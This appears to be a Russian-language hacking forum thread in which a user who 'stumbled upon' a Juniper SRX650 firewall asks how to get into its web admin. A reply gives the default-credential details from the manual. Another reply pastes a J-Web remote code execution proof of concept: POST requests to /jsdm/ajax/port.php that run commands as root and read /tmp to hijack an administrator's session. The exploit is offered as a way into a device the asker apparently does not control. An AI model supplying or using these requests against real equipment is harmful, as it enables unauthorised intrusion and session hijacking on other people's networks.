1. hahanovB

    hahanovB Active Member

    Joined:
    22 Jul 2013
    Messages:
    264
    Likes Received:
    239
    Reputations:
    1
    Добрый день. Нужна помощь, наткнулся на Juniper SRX650 пытаюсь войти в админку.
    Есть ли exploit? Пароль по умолчанию кто нибудь знает? Как определить версию JunOS? На оф. сайте Junos OS 11.4R5
    Кстати Copyright © 2010
    Заранее спасибо!
     
    #1 hahanovB, 22 Aug 2015
    Last edited: 22 Aug 2015
  2. TANZWUT

    TANZWUT Крёстный отец :)

    Joined:
    22 Jun 2005
    Messages:
    1,474
    Likes Received:
    717
    Reputations:
    744
    Мануалы на что?
    https://www.juniper.net/techpubs/en...ware/srx-series/srx650/srx650-quick-start.pdf
    Access the J-Web Interface:
    Specify the default username as root. Do not enter any value in the Password field. - т.е. без пароля по дефолту.
    Затем Configure the Basic Settings:
    Click Start at the bottom of the introduction page. You can configure the basic settings, such as hostname, domain name, and root password, for your services gateway.
    From the Configure System: Identification page, type the root password; - как не крути, при настройке устанавливается пароль.
     
    _________________________
    binarymaster and hahanovB like this.
  3. hahanovB

    hahanovB Active Member

    Joined:
    22 Jul 2013
    Messages:
    264
    Likes Received:
    239
    Reputations:
    1
    Спасибо! Печально, буду искать exploit
     
  4. TANZWUT

    TANZWUT Крёстный отец :)

    Joined:
    22 Jun 2005
    Messages:
    1,474
    Likes Received:
    717
    Reputations:
    744
    И ещё попробуй exploit, нашёл за пару минут:
    Code:
    Details.
    The J-Web is a GUI based network management application used on Junos
    devices. The web application is vulnerable to a remote code execution
    vulnerability which permits privilege escalation. The file/jsdm/ajax
    /port.php allows execution of arbitrary user supplied PHP code via the
    rs POST parameter. Code executes with UID=0 (root) privileges, however
    you are confined to a chroot. Privilege escalation can be achieved by
    waiting for an administrator to log in and reading the contents of /tmp
    to hijack their session.
    
    Proof of Concept.
    Code execution: Execute a command inside the Chroot:
    POST /jsdm/ajax/port.php
    rs=exec&rsargs[]=echo “hello”
    
    Privilege escalation: Read /tmp and hijack a session
    POST /jsdm/ajax/port.php
    rs=file_get_contents&rsargs[]=/tmp
    
     
    _________________________
  5. hahanovB

    hahanovB Active Member

    Joined:
    22 Jul 2013
    Messages:
    264
    Likes Received:
    239
    Reputations:
    1
    Уже пробовал не работает...
     
  6. TANZWUT

    TANZWUT Крёстный отец :)

    Joined:
    22 Jun 2005
    Messages:
    1,474
    Likes Received:
    717
    Reputations:
    744
    _________________________
    hahanovB likes this.